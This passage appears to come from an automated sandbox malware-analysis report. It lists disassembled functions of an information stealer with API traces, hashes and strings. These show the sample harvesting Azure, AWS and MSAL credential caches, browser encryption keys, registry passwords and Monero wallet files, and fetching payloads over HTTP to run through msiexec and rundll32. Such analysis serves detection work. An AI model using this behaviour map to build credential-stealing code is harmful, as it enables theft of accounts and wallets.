                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: 90c13f1b4fe9b57622eea7ada647627ab38918e58069b35029d72c5c5a7abbd2
                          • Instruction ID: 8223a6847fe7036e0d7c15e19fb0e197dc1391e7711566178379c69a1a582e6a
                          • Opcode Fuzzy Hash: 90c13f1b4fe9b57622eea7ada647627ab38918e58069b35029d72c5c5a7abbd2
                          • Instruction Fuzzy Hash: C541947AA4021867D714F760EC47FED3338ABA4704F404594B649660C5EEF56BC98F92
                          Function 00929010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                          Download Yara Rule
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0092906C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: 999a6f1953ba03a95ec1f8cde153d5258f31fb10fa443db2c15b5e377a77356d
                          • Instruction ID: 7c36494abd805e67270bb53652853983376242324ad5822cb9e3a4ea1db48ec4
                          • Opcode Fuzzy Hash: 999a6f1953ba03a95ec1f8cde153d5258f31fb10fa443db2c15b5e377a77356d
                          • Instruction Fuzzy Hash: 2B71FC71A10208ABDB04DFE4DC89FEEB7B9BF88701F108648F615A7294DF74A945CB61
                          Function 00922E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          • ShellExecuteEx.SHELL32(0000003C), ref: 009231C5
                          • ShellExecuteEx.SHELL32(0000003C), ref: 0092335D
                          • ShellExecuteEx.SHELL32(0000003C), ref: 009234EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                          • API String ID: 2507796910-3625054190
                          • Opcode ID: 7cb5dad48cb6b226da8ca1fbb33aa81e433d3d345da4cb9cb50ad4cace2b86d8
                          • Instruction ID: b4ab002048f3a420275d93faced2fea864aee9aeaf85ccae5f6b183e598b69d0
                          • Opcode Fuzzy Hash: 7cb5dad48cb6b226da8ca1fbb33aa81e433d3d345da4cb9cb50ad4cace2b86d8
                          • Instruction Fuzzy Hash: 311213728001289BDB19FBA0EC92FDEB738AF94300F504559F5067619AEF342B4ACF56
                          Function 009252C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                            • Part of subcall function 00916280: InternetOpenA.WININET(00930DFE,00000001,00000000,00000000,00000000), ref: 009162E1
                            • Part of subcall function 00916280: StrCmpCA.SHLWAPI(?,01050A00), ref: 00916303
                            • Part of subcall function 00916280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00916335
                            • Part of subcall function 00916280: HttpOpenRequestA.WININET(00000000,GET,?,010500C8,00000000,00000000,00400100,00000000), ref: 00916385
                            • Part of subcall function 00916280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009163BF
                            • Part of subcall function 00916280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009163D1
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00925318
                          • lstrlen.KERNEL32(00000000), ref: 0092532F
                            • Part of subcall function 00928E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00928E52
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00925364
                          • lstrlen.KERNEL32(00000000), ref: 00925383
                          • lstrlen.KERNEL32(00000000), ref: 009253AE
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: 8b3578225bccd877e534fa15b9e188cec08a596eb01f042963ae7bb3ad530880
                          • Instruction ID: 07338da4d65fb6fae1bcdc6aaf9bdb0245959b22ae5b9c7d806a25db00efe307
                          • Opcode Fuzzy Hash: 8b3578225bccd877e534fa15b9e188cec08a596eb01f042963ae7bb3ad530880
                          • Instruction Fuzzy Hash: 07514F31911158ABCB18FF60ED92FED7779AF94300F504018F9066B1A6EF346B46CBA6
                          Function 009212D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 33bb9812b05595727150e0bace489d80172411c8efe6f0aa032fc5df1e9af086
                          • Instruction ID: 58edad4922e2105c385b9ecdf9fcc64728f681879e697cd9d374f3d54c73baf7
                          • Opcode Fuzzy Hash: 33bb9812b05595727150e0bace489d80172411c8efe6f0aa032fc5df1e9af086
                          • Instruction Fuzzy Hash: D8C187B69012299BCB14EF60EC89FEE7379BFA4304F0045D8F50A67245DE74AA85CF91
                          Function 00924280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00928DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00928E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 009242EC
                          • lstrcat.KERNEL32(?,010502F0), ref: 0092430B
                          • lstrcat.KERNEL32(?,?), ref: 0092431F
                          • lstrcat.KERNEL32(?,0104F490), ref: 00924333
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 00928D90: GetFileAttributesA.KERNEL32(00000000,?,00911B54,?,?,0093564C,?,?,00930E1F), ref: 00928D9F
                            • Part of subcall function 00919CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00919D39
                            • Part of subcall function 009199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009199EC
                            • Part of subcall function 009199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919A11
                            • Part of subcall function 009199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00919A31
                            • Part of subcall function 009199C0: ReadFile.KERNEL32(000000FF,?,00000000,0091148F,00000000), ref: 00919A5A
                            • Part of subcall function 009199C0: LocalFree.KERNEL32(0091148F), ref: 00919A90
                            • Part of subcall function 009199C0: CloseHandle.KERNEL32(000000FF), ref: 00919A9A
                            • Part of subcall function 009293C0: GlobalAlloc.KERNEL32(00000000,009243DD,009243DD), ref: 009293D3
                          • StrStrA.SHLWAPI(?,01050308), ref: 009243F3
                          • GlobalFree.KERNEL32(?), ref: 00924512
                            • Part of subcall function 00919AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00914EEE,00000000,00000000), ref: 00919AEF
                            • Part of subcall function 00919AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00914EEE,00000000,?), ref: 00919B01
                            • Part of subcall function 00919AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00914EEE,00000000,00000000), ref: 00919B2A
                            • Part of subcall function 00919AC0: LocalFree.KERNEL32(?,?,?,?,00914EEE,00000000,?), ref: 00919B3F
                          • lstrcat.KERNEL32(?,00000000), ref: 009244A3
                          • StrCmpCA.SHLWAPI(?,009308D1), ref: 009244C0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 009244D2
                          • lstrcat.KERNEL32(00000000,?), ref: 009244E5
                          • lstrcat.KERNEL32(00000000,00930FB8), ref: 009244F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID:
                          • API String ID: 3541710228-0
                          • Opcode ID: 0cadd4622bdf64a9f8805a922663dc3c1127bdc3c17fb94760a7ad621165fe84
                          • Instruction ID: 59d25d937762dd1e90f29f49deacf5e0c12d59565c212378866aa1c7babfcbf9
                          • Opcode Fuzzy Hash: 0cadd4622bdf64a9f8805a922663dc3c1127bdc3c17fb94760a7ad621165fe84
                          • Instruction Fuzzy Hash: 43715976900218ABDB14EBA0EC95FEE777DAF88300F004598F605A7185EE75DB49CF91
                          Function 00911310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 009112A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009112B4
                            • Part of subcall function 009112A0: RtlAllocateHeap.NTDLL(00000000), ref: 009112BB
                            • Part of subcall function 009112A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009112D7
                            • Part of subcall function 009112A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009112F5
                            • Part of subcall function 009112A0: RegCloseKey.ADVAPI32(?), ref: 009112FF
                          • lstrcat.KERNEL32(?,00000000), ref: 0091134F
                          • lstrlen.KERNEL32(?), ref: 0091135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00911377
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                            • Part of subcall function 00928B60: GetSystemTime.KERNEL32(00930E1A,0104B3D0,009305AE,?,?,009113F9,?,0000001A,00930E1A,00000000,?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 00928B86
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00911465
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                            • Part of subcall function 009199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009199EC
                            • Part of subcall function 009199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919A11
                            • Part of subcall function 009199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00919A31
                            • Part of subcall function 009199C0: ReadFile.KERNEL32(000000FF,?,00000000,0091148F,00000000), ref: 00919A5A
                            • Part of subcall function 009199C0: LocalFree.KERNEL32(0091148F), ref: 00919A90
                            • Part of subcall function 009199C0: CloseHandle.KERNEL32(000000FF), ref: 00919A9A
                          • DeleteFileA.KERNEL32(00000000), ref: 009114EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: 284728ea427731e724f96b58c33385e861fc5111036fda8d8c5e2358baf0a2f6
                          • Instruction ID: 45ba227ec4dc7eaf1408ca1a0fbde1bdf06677134dd3f666703eaa7bc506efad
                          • Opcode Fuzzy Hash: 284728ea427731e724f96b58c33385e861fc5111036fda8d8c5e2358baf0a2f6
                          • Instruction Fuzzy Hash: 8A5137B2D5012957CB15FB60ED92FED737CAF94300F4045D8B60A62096EE706B89CFA6
                          Function 009175D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 009172D0: memset.MSVCRT ref: 00917314
                            • Part of subcall function 009172D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0091733A
                            • Part of subcall function 009172D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009173B1
                            • Part of subcall function 009172D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0091740D
                            • Part of subcall function 009172D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00917452
                            • Part of subcall function 009172D0: HeapFree.KERNEL32(00000000), ref: 00917459
                          • lstrcat.KERNEL32(00000000,009317FC), ref: 00917606
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00917648
                          • lstrcat.KERNEL32(00000000, : ), ref: 0091765A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0091768F
                          • lstrcat.KERNEL32(00000000,00931804), ref: 009176A0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 009176D3
                          • lstrcat.KERNEL32(00000000,00931808), ref: 009176ED
                          • task.LIBCPMTD ref: 009176FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                          • String ID: :
                          • API String ID: 3191641157-3653984579
                          • Opcode ID: 29fe1ddd90e6c59cd65fe4383f0a2a6b574e4026fb316e1814985147b63828c8
                          • Instruction ID: 054c69c8d0a0dcaa48e31ad8daf03caf5af101b4a06718984245acbdf2332e3b
                          • Opcode Fuzzy Hash: 29fe1ddd90e6c59cd65fe4383f0a2a6b574e4026fb316e1814985147b63828c8
                          • Instruction Fuzzy Hash: F0312F72A04209EBCB04EBE4DC55EEF7775AB85302B144658E102B7160DE34A986DB52
                          Function 009172D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00917314
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0091733A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009173B1
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0091740D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00917452
                          • HeapFree.KERNEL32(00000000), ref: 00917459
                          • task.LIBCPMTD ref: 00917555
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
